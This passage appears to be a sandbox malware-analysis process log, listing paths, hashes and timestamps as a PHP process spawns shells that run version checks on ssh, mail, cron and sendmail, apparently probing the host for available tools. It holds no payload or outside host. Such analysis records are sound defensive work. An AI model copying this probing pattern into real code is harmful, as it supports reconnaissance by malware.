Path: | /bin/dash |
Arguments: | sh -c "ssh --version" |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | - |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/ssh |
Arguments: | ssh --version |
File size: | 707248 bytes |
MD5 hash: | 1364a38b48fc80f887f7071720836346 |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/php |
Arguments: | - |
File size: | 21 bytes |
MD5 hash: | dfdca72c2ef9d3295a7b0703027330c1 |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | sh -c "mail --version" |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/php |
Arguments: | - |
File size: | 21 bytes |
MD5 hash: | dfdca72c2ef9d3295a7b0703027330c1 |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | sh -c "cron --version" |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | - |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/sbin/cron |
Arguments: | cron --version |
File size: | 4472 bytes |
MD5 hash: | 162d6f607a789827ab83f6393c566acf |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/php |
Arguments: | - |
File size: | 21 bytes |
MD5 hash: | dfdca72c2ef9d3295a7b0703027330c1 |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | sh -c "sendmail --version" |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |